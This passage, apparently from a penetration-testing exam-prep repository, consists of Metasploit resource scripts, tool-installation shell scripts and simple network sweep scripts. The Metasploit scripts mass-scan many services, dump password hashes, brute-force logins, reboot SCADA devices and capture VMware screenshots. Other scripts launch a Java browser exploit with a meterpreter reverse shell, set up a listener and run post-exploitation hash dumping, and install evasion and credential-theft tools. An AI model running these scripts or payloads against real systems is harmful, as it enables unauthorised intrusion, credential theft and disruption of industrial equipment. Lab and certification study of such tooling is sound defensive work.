 8 | use auxiliary/scanner/ipmi/ipmi_version
 9 | run
10 | 
11 | use auxiliary/scanner/ipmi/ipmi_dumphashes
12 | run
13 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/lotus.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 80
 4 | 
 5 | use auxiliary/scanner/lotus/lotus_domino_hashes
 6 | run
 7 | 
 8 | use auxiliary/scanner/lotus/lotus_domino_version
 9 | run
10 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/misc.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 5920
4 | 
5 | use auxiliary/scanner/misc/cctv_dvr_login
6 | run
7 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/misc/java.rc:
--------------------------------------------------------------------------------
 1 | use exploit/multi/browser/java_jre17_jmxbean
 2 | set SRVPORT 443
 3 | set URIPATH /
 4 | set PAYLOAD java/meterpreter/reverse_tcp
 5 | set LHOST 
 6 | set LPORT 443
 7 | set InitialAutoRunScript migrate -f
 8 | exploit
 9 | set AutoRunScript /opt/scripts/resource/post.rc
10 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/misc/listener.rc:
--------------------------------------------------------------------------------
 1 | use exploit/multi/handler
 2 | set PAYLOAD windows/meterpreter/reverse_tcp
 3 | set LHOST #
 4 | set LPORT 443
 5 | set ExitOnSession false
 6 | set InitialAutoRunScript migrate -f
 7 | 
 8 | <ruby>
 9 |      sleep(3)
10 | </ruby>
11 | 
12 | exploit -j
13 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/misc/post.rc:
--------------------------------------------------------------------------------
1 | getsystem
2 | sysinfo
3 | hasdump
4 | 
5 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/motorola.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 407
4 | 
5 | use auxiliary/scanner/motorola/timbuktu_udp
6 | run
7 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/mssql.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 1433
 4 | 
 5 | use scanner/mssql/mssql_ping
 6 | run
 7 | 
 8 | use scanner/mssql/mssql_login
 9 | run
10 | 
11 | use scanner/mssql/mssql_hashdump
12 | run
13 | 
14 | use scanner/mssql/mssql_schemadump
15 | run
16 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/mysql.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 3306
 4 | 
 5 | use auxiliary/scanner/mysql/mysql_version
 6 | run
 7 | 
 8 | use scanner/mysql/mysql_authbypass_hashdump
 9 | run
10 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/nessus.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 8834
4 | 
5 | use auxiliary/scanner/nessus/nessus_xmlrpc_ping
6 | run
7 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/netbios.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 137
 4 | 
 5 | use auxiliary/scanner/netbios/nbname
 6 | run
 7 | 
 8 | use auxiliary/scanner/netbios/nbname_probe
 9 | run
10 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/nfs.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 111
 4 | 
 5 | use auxiliary/scanner/misc/sunrpc_portmapper
 6 | run
 7 | 
 8 | use auxiliary/scanner/nfs/nfsmount
 9 | run
10 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/ntp.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 123
 4 | 
 5 | use auxiliary/scanner/ntp/ntp_monlist
 6 | run
 7 | 
 8 | use auxiliary/scanner/ntp/ntp_readvar
 9 | run
10 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/oracle.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 1158
 4 | 
 5 | use auxiliary/scanner/oracle/emc_sid
 6 | run
 7 | 
 8 | use auxiliary/scanner/oracle/spy_sid
 9 | run
10 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/oracle2.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 5560
 4 | 
 5 | use auxiliary/scanner/oracle/isqlplus_login
 6 | run
 7 | 
 8 | use auxiliary/scanner/oracle/isqlplus_sidbrute
 9 | run
10 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/oracle3.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 1521
 4 | 
 5 | use auxiliary/scanner/oracle/oracle_hashdump
 6 | run
 7 | 
 8 | use auxiliary/scanner/oracle/oracle_login
 9 | run
10 | 
11 | use auxiliary/scanner/oracle/sid_brute
12 | run
13 | 
14 | use auxiliary/scanner/oracle/sid_enum
15 | run
16 | 
17 | use auxiliary/scanner/oracle/tnslsnr_version
18 | run
19 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/oracle4.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 8080
 4 | 
 5 | use auxiliary/scanner/oracle/xdb_sid_brute
 6 | run
 7 | 
 8 | use auxiliary/scanner/oracle/xdb_sid
 9 | run
10 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/pcanywhere.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 5631
4 | 
5 | use auxiliary/scanner/pcanywhere/pcanywhere_tcp
6 | run
7 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/pcanywhere2.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 5632
4 | 
5 | use auxiliary/scanner/pcanywhere/pcanywhere_udp
6 | run
7 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/pop3.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 110
4 | 
5 | use auxiliary/scanner/pop3/pop3_version
6 | run
7 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/postgres.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 5432
 4 | 
 5 | use auxiliary/scanner/postgres/postgres_dbname_flag_injection
 6 | run
 7 | 
 8 | use auxiliary/scanner/postgres/postgres_hashdump
 9 | run
10 | 
11 | use auxiliary/scanner/postgres/postgres_login
12 | run
13 | 
14 | use auxiliary/scanner/postgres/postgres_schemadump
15 | run
16 | 
17 | use auxiliary/scanner/postgres/postgres_version
18 | run
19 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/printers.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 9100
 4 | 
 5 | use auxiliary/scanner/printer/printer_download_file
 6 | run
 7 | 
 8 | use auxiliary/scanner/printer/printer_env_vars
 9 | run
10 | 
11 | use auxiliary/scanner/printer/printer_list_dir
12 | run
13 | 
14 | use auxiliary/scanner/printer/printer_list_volumes
15 | run
16 | 
17 | use auxiliary/scanner/printer/printer_ready_message
18 | run
19 | 
20 | use auxiliary/scanner/printer/printer_version_info
21 | run
22 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/rdp.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 3389
4 | 
5 | use auxiliary/scanner/rdp/ms12_020_check
6 | run
7 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/recon-ng/active.rc:
--------------------------------------------------------------------------------
 1 | workspaces add yyy
 2 | add companies
 3 | xxx
 4 | none
 5 | add domains
 6 | yyy
 7 | 
 8 | use recon/domains-hosts/brute_hosts
 9 | run
10 | 
11 | use recon/domains-hosts/ssl_san
12 | run
13 | 
14 | use recon/domains-hosts/vpnhunter
15 | run
16 | 
17 | use discovery/info_disclosure/cache_snoop
18 | run
19 | 
20 | use discovery/info_disclosure/interesting_files
21 | run
22 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/recon-ng/export.rc:
--------------------------------------------------------------------------------
 1 | spool start /opt/discover/tmp
 2 | show contacts
 3 | spool stop
 4 | spool start /opt/discover/tmp2
 5 | show creds
 6 | spool stop
 7 | spool start /opt/discover/tmp3
 8 | show hosts
 9 | spool stop
10 | spool start /opt/discover/tmp4
11 | show leaks
12 | spool stop
13 | spool start /opt/discover/tmp5
14 | show ports
15 | spool stop
16 | spool start /opt/discover/tmp6
17 | show vulnerabilities
18 | spool stop
19 | back
20 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/recon-ng/passive.rc:
--------------------------------------------------------------------------------
 1 | workspaces add yyy
 2 | add companies
 3 | xxx
 4 | none
 5 | add domains
 6 | yyy
 7 | 
 8 | use recon/domains-hosts/baidu_site
 9 | run
10 | 
11 | use recon/domains-hosts/bing_domain_api
12 | run
13 | 
14 | use recon/domains-hosts/bing_domain_web
15 | run
16 | 
17 | use recon/domains-hosts/google_site_api
18 | run
19 | 
20 | use recon/domains-hosts/google_site_web
21 | run
22 | 
23 | use recon/domains-hosts/netcraft
24 | run
25 | 
26 | use recon/domains-hosts/shodan_hostname
27 | run
28 | 
29 | use recon/domains-hosts/yahoo_site
30 | run
31 | 
32 | use recon/domains-vulnerabilities/punkspider
33 | run
34 | 
35 | use recon/domains-vulnerabilities/xssed
36 | run
37 | 
38 | use recon/hosts-hosts/bing_ip
39 | run
40 | 
41 | use recon/hosts-hosts/ip_neighbor
42 | run
43 | 
44 | use recon/hosts-hosts/ipinfodb
45 | run
46 | 
47 | use recon/hosts-hosts/resolve
48 | run
49 | 
50 | use recon/domains-contacts/builtwith
51 | run
52 | 
53 | use recon/domains-contacts/pgp_search
54 | run
55 | 
56 | use recon/domains-contacts/whois_pocs
57 | run
58 | 
59 | use recon/companies-contacts/facebook
60 | run
61 | 
62 | use recon/contacts-contacts/rapportive
63 | run
64 | 
65 | use recon/contacts-creds/haveibeenpwned
66 | run
67 | 
68 | use recon/contacts-creds/pwnedlist
69 | run
70 | 
71 | use recon/contacts-creds/should_change_password
72 | run
73 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/redis.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 6379
4 | 
5 | use auxiliary/scanner/misc/redis_server
6 | run
7 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/rmi.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 1099
4 | 
5 | use auxiliary/scanner/misc/java_rmi_server
6 | run
7 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/rservices.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 512
4 | 
5 | use auxiliary/scanner/rservices/rexec_login
6 | run
7 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/rservices2.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 513
4 | 
5 | use auxiliary/scanner/rservices/rlogin_login
6 | run
7 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/rservices3.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 514
4 | 
5 | use auxiliary/scanner/rservices/rsh_login
6 | run
7 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/scada.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 2362
 4 | 
 5 | use auxiliary/scanner/scada/digi_addp_reboot
 6 | run
 7 | 
 8 | use auxiliary/scanner/scada/digi_addp_version
 9 | run
10 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/scada2.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 771
 4 | 
 5 | use auxiliary/scanner/scada/digi_realport_serialport_scan
 6 | run
 7 | 
 8 | use auxiliary/scanner/scada/digi_realport_version
 9 | run
10 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/scada3.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 80
4 | 
5 | use auxiliary/scanner/scada/indusoft_ntwebserver_fileaccess
6 | run
7 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/scada4.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 28784
4 | 
5 | use auxiliary/scanner/scada/koyo_login
6 | run
7 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/scada5.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 502
 4 | 
 5 | use auxiliary/scanner/scada/modbusclient
 6 | run
 7 | 
 8 | use auxiliary/scanner/scada/modbusdetect
 9 | run
10 | 
11 | use auxiliary/scanner/scada/modbus_findunitid
12 | run
13 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/scada6.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 46824
4 | 
5 | use auxiliary/scanner/scada/sielco_winlog_fileaccess
6 | run
7 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/sip.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 5060
 4 | 
 5 | use auxiliary/scanner/sip/enumerator
 6 | run
 7 | 
 8 | use auxiliary/scanner/sip/options
 9 | run
10 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/sip2.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 5060
 4 | 
 5 | use auxiliary/scanner/sip/enumerator_tcp
 6 | run
 7 | 
 8 | use auxiliary/scanner/sip/options_tcp
 9 | run
10 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/smb.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 445
 4 | 
 5 | use auxiliary/scanner/smb/pipe_auditor
 6 | run
 7 | 
 8 | use auxiliary/scanner/smb/pipe_dcerpc_auditor
 9 | run
10 | 
11 | use auxiliary/scanner/smb/psexec_loggedin_users
12 | run
13 | 
14 | use auxiliary/scanner/smb/smb2
15 | run
16 | 
17 | use auxiliary/scanner/smb/smb_enumshares
18 | run
19 | 
20 | use auxiliary/scanner/smb/smb_enumusers_domain
21 | run
22 | 
23 | use auxiliary/scanner/smb/smb_enumusers
24 | run
25 | 
26 | use auxiliary/scanner/smb/smb_login
27 | run
28 | 
29 | use auxiliary/scanner/smb/smb_lookupsid
30 | run
31 | 
32 | use auxiliary/scanner/smb/smb_version
33 | run
34 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/smtp.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 25
 4 | 
 5 | use auxiliary/scanner/smtp/smtp_enum
 6 | run
 7 | 
 8 | use auxiliary/scanner/smtp/smtp_relay
 9 | run
10 | 
11 | use auxiliary/scanner/smtp/smtp_version
12 | run
13 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/smtp2.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 465
 4 | 
 5 | use auxiliary/scanner/smtp/smtp_enum
 6 | run
 7 | 
 8 | use auxiliary/scanner/smtp/smtp_relay
 9 | run
10 | 
11 | use auxiliary/scanner/smtp/smtp_version
12 | run
13 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/snmp.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 161
 4 | 
 5 | use auxiliary/scanner/misc/oki_scanner
 6 | run
 7 | 
 8 | use auxiliary/scanner/snmp/aix_version
 9 | run
10 | 
11 | use auxiliary/scanner/snmp/brocade_enumhash
12 | run
13 | 
14 | use auxiliary/scanner/snmp/cisco_config_tftp
15 | run
16 | 
17 | use auxiliary/scanner/snmp/cisco_upload_file
18 | echo 'Hello world!' > /tmp/test.txt
19 | set SOURCE /tmp/test.txt
20 | run
21 | 
22 | use auxiliary/scanner/snmp/netopia_enum
23 | run
24 | 
25 | use auxiliary/scanner/snmp/snmp_enum
26 | run
27 | 
28 | use auxiliary/scanner/snmp/snmp_enumshares
29 | run
30 | 
31 | use auxiliary/scanner/snmp/snmp_enumusers
32 | run
33 | 
34 | use auxiliary/scanner/snmp/ubee_ddw3611
35 | run
36 | 
37 | use auxiliary/scanner/snmp/xerox_workcentre_enumusers
38 | run
39 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/ssh.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 22
4 | 
5 | use auxiliary/scanner/ssh/ssh_version
6 | run
7 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/telnet.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 23
 4 | 
 5 | use auxiliary/scanner/telnet/telnet_encrypt_overflow
 6 | run
 7 | 
 8 | use auxiliary/scanner/telnet/telnet_ruggedcom
 9 | run
10 | 
11 | use auxiliary/scanner/telnet/telnet_version
12 | run
13 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/telnet2.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 30718
4 | 
5 | use auxiliary/scanner/telnet/lantronix_telnet_password
6 | run
7 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/telnet3.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 9999
4 | 
5 | use auxiliary/scanner/telnet/lantronix_telnet_version
6 | run
7 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/tftp.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 69
 4 | 
 5 | use auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp
 6 | run
 7 | 
 8 | use auxiliary/scanner/tftp/netdecision_tftp
 9 | run
10 | 
11 | use auxiliary/scanner/tftp/tftpbrute
12 | run
13 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/tomcat.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 8080
 4 | 
 5 | use auxiliary/scanner/http/tomcat_enum
 6 | run
 7 | 
 8 | use auxiliary/scanner/http/tomcat_mgr_login
 9 | run
10 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/upnp.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 1900
4 | 
5 | use auxiliary/scanner/upnp/ssdp_msearch
6 | run
7 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/vmware.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 443
 4 | 
 5 | use auxiliary/scanner/vmware/esx_fingerprint
 6 | run
 7 | 
 8 | use auxiliary/scanner/vmware/vmware_enum_permissions
 9 | run
10 | 
11 | use auxiliary/scanner/vmware/vmware_enum_sessions
12 | run
13 | 
14 | use auxiliary/scanner/vmware/vmware_enum_users
15 | run
16 | 
17 | use auxiliary/scanner/vmware/vmware_enum_vms
18 | run
19 | 
20 | use auxiliary/scanner/vmware/vmware_host_details
21 | run
22 | 
23 | use auxiliary/scanner/vmware/vmware_screenshot_stealer
24 | run
25 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/vmware2.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 902
4 | 
5 | use auxiliary/scanner/vmware/vmauthd_version
6 | run
7 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/vnc.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 5900
 4 | 
 5 | use auxiliary/scanner/vnc/vnc_login
 6 | run
 7 | 
 8 | use auxiliary/scanner/vnc/vnc_none_auth
 9 | run
10 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/vxworks.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | setg RPORT 17185
 4 | 
 5 | use auxiliary/scanner/vxworks/wdbrpc_bootline
 6 | run
 7 | 
 8 | use auxiliary/scanner/vxworks/wdbrpc_version
 9 | run
10 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/winrm.rc:
--------------------------------------------------------------------------------
1 | setg RHOSTS file:
2 | setg THREADS 255
3 | setg RPORT 5985
4 | 
5 | use auxiliary/scanner/winrm/winrm_auth_methods
6 | run
7 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/resource/x11.rc:
--------------------------------------------------------------------------------
 1 | setg RHOSTS file:
 2 | setg THREADS 255
 3 | 
 4 | use auxiliary/scanner/x11/open_x11
 5 | set RPORT 6000
 6 | run
 7 | 
 8 | use auxiliary/scanner/x11/open_x11
 9 | set RPORT 6001
10 | run
11 | 
12 | use auxiliary/scanner/x11/open_x11
13 | set RPORT 6002
14 | run
15 | 
16 | use auxiliary/scanner/x11/open_x11
17 | set RPORT 6003
18 | run
19 | 
20 | use auxiliary/scanner/x11/open_x11
21 | set RPORT 6004
22 | run
23 | 
24 | use auxiliary/scanner/x11/open_x11
25 | set RPORT 6005
26 | run
27 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/setup.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | clear
 4 | echo
 5 | echo
 6 | 
 7 | echo -e "\e[1;33mInstalling Filezilla.\e[0m"
 8 | apt-get -y install filezilla
 9 | echo
10 | echo -e "\e[1;33mInstalling gedit.\e[0m"
11 | apt-get -y install gedit
12 | echo
13 | echo -e "\e[1;33mInstalling xdotool.\e[0m"
14 | apt-get -y install xdotool
15 | echo
16 | echo
17 | echo -e "\e[1;33mChecking if goofile is installed, if not installing.\e[0m"
18 | echo
19 | 
20 | which goofile >/dev/null 2>&1
21 | 
22 | if [ $? -eq 0 ]; then
23 |      echo
24 | else
25 |      echo
26 |      apt-get -y install goofile
27 |      echo
28 |      exit 1
29 | fi
30 | 
31 | echo
32 | echo
33 | 


--------------------------------------------------------------------------------
/ENUMERATION/discover-master/update.sh:
--------------------------------------------------------------------------------
  1 | #!/bin/bash
  2 | 
  3 | clear
  4 | echo
  5 | echo
  6 | 
  7 | echo -e "\e[1;34mUpdating OS.\e[0m"
  8 | apt-get update ; apt-get -y upgrade ; apt-get -y dist-upgrade ; apt-get -y autoremove ; apt-get -y autoclean ; echo
  9 | 
 10 | if [ -d /opt/discover/.git ]; then
 11 |      echo -e "\e[1;34mUpdating Discover scripts.\e[0m"
 12 |      cd /opt/discover/ ; git pull
 13 |      cp /opt/discover/alias /root/.bash_aliases ; source /root/.bash_aliases
 14 |      echo
 15 | else
 16 |      rm -rf /opt/scripts/
 17 |      echo -e "\e[1;33mInstalling scripts into new location: /opt/discover/.\e[0m"
 18 |      git clone git://github.com/leebaird/discover.git /opt/discover
 19 |      echo
 20 | fi
 21 | 
 22 | if [ -d /opt/easy-creds/.git ]; then
 23 |      echo -e "\e[1;34mUpdating easy-creds.\e[0m"
 24 |      cd /opt/easy-creds/ ; git pull
 25 |      echo
 26 | else
 27 |      echo -e "\e[1;33mInstalling easy-creds.\e[0m"
 28 |      git clone git://github.com/brav0hax/easy-creds.git /opt/easy-creds
 29 |      ln -s /opt/easy-creds/easy-creds.sh  /usr/bin/easy-creds
 30 |      echo
 31 | fi
 32 | 
 33 | if [ -d /opt/EyeWitness/.git ]; then
 34 |      echo -e "\e[1;34mUpdating EyeWitness.\e[0m"
 35 |      cd /opt/EyeWitness/ ; git pull
 36 |      echo
 37 | else
 38 |      echo -e "\e[1;33mInstalling EyeWitness.\e[0m"
 39 |      git clone git://github.com/ChrisTruncer/EyeWitness.git /opt/EyeWitness
 40 | fi
 41 | 
 42 | if [ ! -f /opt/google/chrome/google-chrome ]; then
 43 |      echo -e "\e[1;33mInstalling Google Chrome.\e[0m"
 44 |      wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb
 45 |      dpkg -i google-chrome-stable_current_amd64.deb
 46 |      head -n -1 /opt/google/chrome/google-chrome > temp.txt ; mv temp.txt /opt/google/chrome/google-chrome
 47 |      echo 'exec -a "$0" "$HERE/chrome"  "$@" --user-data-dir' >> /opt/google/chrome/google-chrome
 48 |      chmod +x /opt/google/chrome/google-chrome
 49 |      rm google-chrome-stable_current_amd64.deb
 50 |      echo
 51 | fi
 52 | 
 53 | if [ ! -f /usr/bin/i586-mingw32msvc-c++ ]; then
 54 |      echo -e "\e[1;33mInstalling Ming C Compiler.\e[0m"
 55 |      apt-get -y install mingw32
 56 |      echo
 57 | fi
 58 | 
 59 | if [ -d /opt/rawr/.git ]; then
 60 |      echo -e "\e[1;34mUpdating RAWR.\e[0m"
 61 |      cd /opt/rawr/ ; git pull
 62 |      echo
 63 | else
 64 |      echo -e "\e[1;33mInstalling RAWR.\e[0m"
 65 |      git clone https://bitbucket.org/al14s/rawr.git /opt/rawr
 66 |      /opt/rawr/install.sh y
 67 | fi
 68 | 
 69 | if [ -d /opt/smbexec/.git ]; then
 70 |      echo -e "\e[1;34mUpdating smbexec.\e[0m"
 71 |      cd /opt/smbexec/ ; git pull
 72 |      echo
 73 | else
 74 |      echo -e "\e[1;33mInstalling smbexec.\e[0m"
 75 |      git clone git://github.com/pentestgeek/smbexec-2.git /opt/smbexec
 76 |      ln -s /opt/smbexec/smbexec.rb  /usr/bin/smbexec
 77 |      echo
 78 | fi
 79 | 
 80 | if [ -d /opt/veil/.git ]; then
 81 |      echo -e "\e[1;33mInstalling Veil-Evasion suite.\e[0m"
 82 |      unlink /usr/bin/veil
 83 |      rm -rf /opt/veil
 84 |      apt-get -y install veil-evasion veil-catapult
 85 |      echo
 86 | fi
 87 | 
 88 | if [ ! -f /usr/share/windows-binaries/wce.exe ]; then
 89 |      echo -e "\e[1;33mInstalling Windows Credential Editor.\e[0m"
 90 |      wget http://www.ampliasecurity.com/research/wce_v1_4beta_universal.zip
 91 |      unzip wce_v1_4beta_universal.zip
 92 |      chmod 755 wce.exe
 93 |      mv wce.exe /usr/share/windows-binaries/
 94 |      rm Changelog LICENSE.txt README wce_v1_4beta_universal.zip
 95 |      echo
 96 | fi
 97 | 
 98 | echo -e "\e[1;34mUpdating locate database.\e[0m" ; updatedb
 99 | 
100 | echo
101 | echo
102 | 


--------------------------------------------------------------------------------
/ENUMERATION/port scan & ping sweep/fping_sweep:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | #scan the network with fping
3 | 
4 | for ip in $(seq 1 254);do fping 10.11.1.$ip >> fping.txt;done;grep alive ./fping.txt
5 | 


--------------------------------------------------------------------------------
/ENUMERATION/port scan & ping sweep/nc-port-scanner.sh:
--------------------------------------------------------------------------------
 1 | # This is an nc port scanner
 2 | # can specify range. Instead of 80, do 1-65535
 3 | # scans TCP
 4 | # for UDP do nc -unvv -w 1 -z 192.168.x.x 160-165
 5 | 
 6 | > /tmp/ncscan.txt
 7 | for ip in $(seq 1 5);
 8 | 	do nc -nvv -z 192.168.1.$ip 80 &>> /tmp/ncscan.txt
 9 | done
10 | sleep 1; 
11 | grep -i open --color /tmp/ncscan.txt;
12 | 


--------------------------------------------------------------------------------
/ENUMERATION/port scan & ping sweep/nmap-ARP-ping.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | # ARP ping with nmap
3 | nmap -sP -PR 10.11.1.0/24 -oG nmap-arp.txt
4 | 


--------------------------------------------------------------------------------
/ENUMERATION/port scan & ping sweep/ping-sweep.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | #ping sweeper of  my current subnet
 3 | 
 4 | for ip in $(seq 1 254);do
 5 |         ping -c 1 192.168.1.$ip | grep "bytes from" | cut -d" " -f4 | cut -d":" -f1 &
 6 | #        ping -c 1 192.168.1.$ip | grep "bytes from" | cut -d" " -f4 | cut -d":" -f1 &
 7 | done
 8 | # wait 2 seconds and press enter to exit
 9 | sleep 2;echo -e \\n
10 | 


--------------------------------------------------------------------------------
/EXAM/documentation-strategy:
--------------------------------------------------------------------------------
1 | 1. Working notes and screenshots into KeepNote
2 | 2. Write the final Pentest Report (including my tools, TTPs, finding) from the beginning of labs. Not at the END!
